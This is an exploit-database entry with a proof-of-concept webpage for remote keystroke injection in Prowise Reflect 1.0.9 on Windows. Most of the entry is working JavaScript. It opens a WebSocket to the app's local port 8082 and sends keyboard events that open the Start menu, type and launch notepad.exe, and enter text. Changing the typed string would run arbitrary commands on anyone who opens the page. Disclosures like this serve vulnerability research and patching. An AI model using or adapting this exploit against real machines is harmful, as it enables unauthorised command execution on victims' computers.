Prowise Reflect 1.0.9 Remote Keystroke Injection

2022.03.02
Credit: Rik Lutz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection # Date: 30/10/2022 # Exploit Author: Rik Lutz # Vendor Homepage: https://www.prowise.com/ # Version: V1.0.9 # Tested on: Windows 10 # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. # Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed), # or by visiting a malicious website. This POC contains the malicious webpage. # Steps: # 1. Start Prowise reflect # 2. Try to connect to a reflect server e.q. ygm7u6od # 3. When it is connecting click exploit # - Start menu will open, types notepad.exe and types hello world. <!DOCTYPE HTML> <html> <head> <script type = "text/javascript"> function wait(ms){ var start = new Date().getTime(); var end = start; while(end < start + ms) { end = new Date().getTime(); } } function WebSocketTest() { var StateConnecting = new Boolean(false); if ("WebSocket" in window) { // Let us open a web socket var ws = new WebSocket("ws://localhost:8082"); ws.onopen = function() { ws.send('{"event":"keyboard", "key":"super"}'); wait(400); //character is slower // ws.send('{"event":"keyboard", "character":"notepad.exe"}'}; // You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true var exploitcode = "notepad.exe" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(300); ws.send('{"event":"keyboard", "key":"enter"}'); wait(2000); exploitcode = "Hello world!" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(200); }; ws.onmessage = function (evt) { var received_msg = evt.data; }; ws.onclose = function() { // websocket is closed. alert("Connection is closed..."); }; } else { // The browser doesn't support WebSocket alert("WebSocket NOT supported by your Browser!"); } } </script> </head> <body> <div id = "sse"> <a href = "javascript:WebSocketTest()">Exploit!</a> </div> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top